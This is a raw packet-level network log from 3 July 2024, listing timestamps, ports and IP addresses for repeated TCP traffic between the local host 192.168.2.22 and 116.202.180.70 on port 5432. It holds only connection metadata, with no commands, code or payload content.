Jul 3, 2024 02:22:32.591048002 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.591058969 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.591068983 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.591077089 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.591097116 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.591105938 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.591191053 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.597647905 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.597659111 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.597670078 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.597682953 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.597693920 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.597702026 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.597706079 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.597719908 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.597735882 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.597752094 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.759744883 CEST	49168	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.760091066 CEST	49170	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.764924049 CEST	5432	49170	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.764991045 CEST	49170	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.765259981 CEST	49170	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.767509937 CEST	5432	49168	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:32.767690897 CEST	49168	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:32.770104885 CEST	5432	49170	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:33.512510061 CEST	5432	49170	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:33.512573957 CEST	49170	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:33.513324976 CEST	49170	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:33.514954090 CEST	49170	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:33.515007019 CEST	49170	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:33.518140078 CEST	5432	49170	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:33.519880056 CEST	5432	49170	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:33.519887924 CEST	5432	49170	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:33.520025015 CEST	5432	49170	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:34.022495985 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:34.022949934 CEST	49171	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:34.029073954 CEST	5432	49171	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:34.029150963 CEST	49171	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:34.029478073 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:34.029530048 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:34.029551983 CEST	49171	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:34.035151958 CEST	5432	49171	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:34.183361053 CEST	5432	49170	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:34.183432102 CEST	49170	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:34.680926085 CEST	5432	49171	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:34.681111097 CEST	49171	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:34.681958914 CEST	49171	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:34.684111118 CEST	49171	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:34.684194088 CEST	49171	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:34.686820030 CEST	5432	49171	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:34.688961983 CEST	5432	49171	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:34.688971043 CEST	5432	49171	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:34.689030886 CEST	49171	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:34.694519043 CEST	5432	49171	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:34.694541931 CEST	5432	49171	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:34.694551945 CEST	5432	49171	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:35.056381941 CEST	49170	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:35.056708097 CEST	49172	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:35.061558008 CEST	5432	49172	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:35.061573029 CEST	5432	49170	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:35.061641932 CEST	49170	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:35.061928988 CEST	49172	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:35.061928988 CEST	49172	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:35.066807032 CEST	5432	49172	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:35.349437952 CEST	5432	49171	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:35.349524021 CEST	49171	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:35.693556070 CEST	5432	49172	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:35.693645000 CEST	49172	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:35.694437981 CEST	49172	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:35.696180105 CEST	49172	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:35.700145006 CEST	5432	49172	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:35.703180075 CEST	5432	49172	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:36.119625092 CEST	49171	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:36.120019913 CEST	49173	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:36.125055075 CEST	5432	49171	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:36.125070095 CEST	5432	49173	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:36.125119925 CEST	49171	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:36.125149012 CEST	49173	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:36.125550032 CEST	49173	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:36.130450010 CEST	5432	49173	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:36.499152899 CEST	5432	49172	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:36.499327898 CEST	49172	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:36.788041115 CEST	5432	49173	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:36.788163900 CEST	49173	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:36.788992882 CEST	49173	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:36.790626049 CEST	49173	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:36.792175055 CEST	49174	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:36.793807983 CEST	5432	49173	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:36.795892000 CEST	5432	49173	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:36.795949936 CEST	49173	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:36.796998024 CEST	5432	49174	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:36.797060966 CEST	49174	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:36.797347069 CEST	49174	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:36.802268982 CEST	5432	49174	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:37.436450958 CEST	5432	49174	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:37.436522007 CEST	49174	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:37.437303066 CEST	49174	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:37.438723087 CEST	49174	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:37.439436913 CEST	49175	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:37.442213058 CEST	5432	49174	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:37.443897963 CEST	5432	49174	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:37.443948030 CEST	49174	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:37.444310904 CEST	5432	49175	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:37.444365025 CEST	49175	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:37.444749117 CEST	49175	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:37.449592113 CEST	5432	49175	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:38.084289074 CEST	5432	49175	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:38.084378958 CEST	49175	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:38.085539103 CEST	49175	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:38.087701082 CEST	49175	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:38.088655949 CEST	49176	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:38.090301037 CEST	5432	49175	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:38.092828989 CEST	5432	49175	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:38.092883110 CEST	49175	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:38.093409061 CEST	5432	49176	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:38.093472004 CEST	49176	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:38.093835115 CEST	49176	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:38.098583937 CEST	5432	49176	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:38.731553078 CEST	5432	49176	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:38.731698036 CEST	49176	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:38.732747078 CEST	49176	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:38.735009909 CEST	49176	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:38.736018896 CEST	49177	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:38.737721920 CEST	5432	49176	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:38.740385056 CEST	5432	49176	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:38.740447998 CEST	49176	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:38.740823030 CEST	5432	49177	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:38.740894079 CEST	49177	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:38.741244078 CEST	49177	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:38.746088982 CEST	5432	49177	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:39.386612892 CEST	5432	49177	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:39.386840105 CEST	49177	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:39.390234947 CEST	49177	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:39.395025969 CEST	5432	49177	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:39.400660038 CEST	49177	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:39.403076887 CEST	49178	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:39.405857086 CEST	5432	49177	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:39.405922890 CEST	49177	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:39.407922983 CEST	5432	49178	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:39.408123016 CEST	49178	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:39.408529043 CEST	49178	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:39.413331032 CEST	5432	49178	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:40.037471056 CEST	5432	49178	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:40.037570000 CEST	49178	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:40.038585901 CEST	49178	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:40.040832996 CEST	49178	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:40.043348074 CEST	5432	49178	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:40.045928001 CEST	5432	49178	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:40.045989037 CEST	49178	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:42.618094921 CEST	49179	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:42.623059988 CEST	5432	49179	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:42.623136044 CEST	49179	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:42.623653889 CEST	49179	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:42.628528118 CEST	5432	49179	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:43.269190073 CEST	5432	49179	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:43.269249916 CEST	49179	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:43.269915104 CEST	49179	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:43.271363020 CEST	49179	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:43.274688005 CEST	5432	49179	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:43.276150942 CEST	5432	49179	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:43.925755024 CEST	5432	49179	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:43.925815105 CEST	49179	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:43.925822973 CEST	5432	49179	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:43.925859928 CEST	49179	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:43.927134037 CEST	49172	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:43.927438021 CEST	49180	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:43.935321093 CEST	5432	49172	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:43.935396910 CEST	49172	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:43.936018944 CEST	5432	49180	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:43.936178923 CEST	49180	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:43.936624050 CEST	49180	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:43.944210052 CEST	5432	49180	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:44.591840029 CEST	5432	49180	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:44.591906071 CEST	49180	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:44.600245953 CEST	49180	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:44.602767944 CEST	49180	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:44.607356071 CEST	5432	49180	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:44.609914064 CEST	5432	49180	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:45.281349897 CEST	5432	49180	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:45.281426907 CEST	49180	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:45.282258987 CEST	49179	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:45.282767057 CEST	49181	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:45.287383080 CEST	5432	49179	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:45.287430048 CEST	49179	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:45.287547112 CEST	5432	49181	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:45.287600994 CEST	49181	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:45.287880898 CEST	49181	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:45.292702913 CEST	5432	49181	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:45.944356918 CEST	5432	49181	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:45.944416046 CEST	49181	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:45.959363937 CEST	49181	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:45.960953951 CEST	49181	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:45.964227915 CEST	5432	49181	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:45.967422962 CEST	5432	49181	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:46.640134096 CEST	5432	49181	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:46.640152931 CEST	5432	49181	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:46.640214920 CEST	49181	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:46.657139063 CEST	49180	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:46.657459974 CEST	49182	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:46.662245035 CEST	5432	49182	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:46.662326097 CEST	49182	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:46.662446022 CEST	5432	49180	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:46.662494898 CEST	49180	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:46.662573099 CEST	49182	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:46.667362928 CEST	5432	49182	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:47.312457085 CEST	5432	49182	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:47.312541962 CEST	49182	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:47.313416958 CEST	49182	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:47.315213919 CEST	49182	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:47.321171999 CEST	5432	49182	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:47.324001074 CEST	5432	49182	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:47.953140020 CEST	5432	49182	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:47.953265905 CEST	49182	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:48.705329895 CEST	49181	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:48.705686092 CEST	49183	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:48.711843967 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:48.711911917 CEST	49183	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:48.712184906 CEST	5432	49181	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:48.712219000 CEST	49183	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:48.712234974 CEST	49181	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:48.718528986 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.352168083 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.352232933 CEST	49183	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:49.353116989 CEST	49183	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:49.354592085 CEST	49183	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:49.354774952 CEST	49183	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:49.357930899 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.359709024 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.359718084 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.359778881 CEST	49183	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:49.364651918 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.364660978 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.364672899 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.364722967 CEST	49183	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:49.364746094 CEST	49183	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:49.369613886 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.369649887 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.369658947 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.369668007 CEST	49183	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:49.369697094 CEST	49183	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:49.369832993 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.369879007 CEST	49183	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:49.369913101 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.369930983 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.369971037 CEST	49183	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:49.369971037 CEST	49183	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:49.374758005 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.374767065 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.374775887 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.374789953 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.374836922 CEST	49183	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:49.374836922 CEST	49183	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:49.375555038 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.375607014 CEST	49183	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:49.376101017 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.376159906 CEST	49183	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:49.376672983 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.376727104 CEST	49183	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:49.379662037 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.379683971 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.379714966 CEST	49183	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:49.379729986 CEST	49183	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:49.379736900 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.379798889 CEST	49183	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:49.379847050 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.379897118 CEST	49183	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:49.380495071 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.380544901 CEST	49183	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:49.380578041 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.380630016 CEST	49183	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:49.381058931 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.381110907 CEST	49183	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:49.382630110 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.382668972 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.382683992 CEST	49183	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:49.382714987 CEST	49183	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:49.382874966 CEST	49183	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:49.391385078 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.391462088 CEST	49183	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:49.391505003 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.391541004 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.391549110 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.391556025 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.391563892 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.391570091 CEST	49183	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:49.391581059 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.391601086 CEST	49183	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:49.391612053 CEST	49183	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:49.391623020 CEST	49183	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:49.391629934 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.391675949 CEST	49183	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:49.392299891 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.392337084 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.392344952 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.392359018 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.392366886 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.399590969 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.399600029 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.399609089 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.399641991 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.399650097 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.399657965 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.399666071 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.399673939 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.399682045 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.399691105 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.399698973 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.399708033 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.399715900 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.399724007 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.399732113 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.399739981 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.399748087 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.399756908 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.399765015 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.399774075 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.399780989 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.399790049 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.399797916 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.399801016 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.399811029 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.399821043 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.399832010 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.399840117 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.399848938 CEST	5432	49183	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:49.399857998 CEST	5432	49183	116.202.180.70	192.168.2.22
